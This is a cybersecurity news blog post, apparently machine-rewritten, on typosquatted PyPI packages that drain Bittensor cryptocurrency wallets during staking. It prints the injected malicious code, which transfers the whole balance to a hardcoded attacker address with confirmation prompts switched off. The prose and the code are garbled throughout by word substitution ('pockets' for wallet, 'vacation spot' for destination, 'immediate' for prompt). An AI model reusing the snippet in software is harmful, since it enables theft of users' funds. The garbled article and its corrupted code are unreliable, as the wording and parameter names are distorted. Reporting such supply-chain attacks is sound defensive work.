Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

Posted on August 9, 2025August 9, 2025 By CWS

A classy cryptocurrency theft marketing campaign has emerged concentrating on the Bittensor ecosystem by way of malicious Python packages distributed through the Python Package deal Index (PyPI).

The assault leverages typosquatting methods to deceive builders and customers into putting in compromised variations of professional Bittensor packages, finally leading to full pockets drainage throughout routine staking operations.

The malicious marketing campaign was orchestrated with precision, with all 5 typosquatted packages printed inside a concentrated 25-minute window on August 6, 2025.

These packages included variations similar to “bitensor” (lacking ‘t’), “bittenso” (truncated), and “qbittensor” (prefixed), all designed to imitate the genuine bittensor and bittensor-cli packages.

The attackers strategically selected model numbers 9.9.4 and 9.9.5 to carefully match professional package deal variations, maximizing the chance of unintentional set up by way of developer typos or copy-paste errors.

GitLab analysts recognized the menace by way of their automated package deal monitoring system, which flagged suspicious exercise associated to fashionable Bittensor packages.

The invention revealed a rigorously engineered assault that exploits the belief inherent in routine blockchain operations, particularly concentrating on customers engaged in staking actions who usually possess substantial cryptocurrency holdings.

Evaluation of the Hijacked Staking Mechanism

The assault’s technical sophistication lies in its surgical modification of professional staking performance inside the stake_extrinsic perform positioned in bittensor_cli/src/instructions/stake/add.py.

At line 275, the attackers inserted malicious code that fully subverts the anticipated staking course of:-

consequence = await transfer_extrinsic(
subtensor=subtensor,
pockets=pockets,
vacation spot=”5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR”,
quantity=quantity,
transfer_all=True,
immediate=False
)

This code injection operates with devastating effectivity by setting transfer_all=True to empty complete wallets moderately than simply the supposed staking quantity, whereas immediate=False bypasses person affirmation dialogs.

The hardcoded vacation spot pockets deal with serves as a set level for stolen funds, that are subsequently distributed by way of a multi-hop laundering community involving a number of middleman wallets earlier than reaching the ultimate consolidation deal with.

Equip your SOC with full entry to the most recent menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial

Cyber Security News Tags:Actors, Bittensor, Cryptocurrency, Packages, PyPI, Steal, Threat, Typosquatted, Wallets

Post navigation

Previous Post: Huge Wave of Malicious Efimer Malicious Script Attack Users via WordPress Sites, Malicious Torrents, and Email
Next Post: New Linux Kernel Vulnerability Directly Exploited from Chrome Renderer Sandbox

Related Posts

Hackers Launch Widespread Attacks on Palo Alto GlobalProtect Portals from 7,000+ IPs Hackers Launch Widespread Attacks on Palo Alto GlobalProtect Portals from 7,000+ IPs Cyber Security News
Hackers Using Evilginx to Steal Session Cookies and Bypass Multi-Factor Authentication Tokens Hackers Using Evilginx to Steal Session Cookies and Bypass Multi-Factor Authentication Tokens Cyber Security News
M Cryptocurrency Theft Linked to LastPass Password Manager DataBreach $35M Cryptocurrency Theft Linked to LastPass Password Manager DataBreach Cyber Security News
Critical Cybersecurity Threats: PayPal, Chrome, BeyondTrust Critical Cybersecurity Threats: PayPal, Chrome, BeyondTrust Cyber Security News
Cyber Conflict Intensifies Amid Iran and US-Israeli Tensions Cyber Conflict Intensifies Amid Iran and US-Israeli Tensions Cyber Security News
Cisco IOS and IOS XE Software Vulnerabilities Let Attackers Execute Remote Code Cisco IOS and IOS XE Software Vulnerabilities Let Attackers Execute Remote Code Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark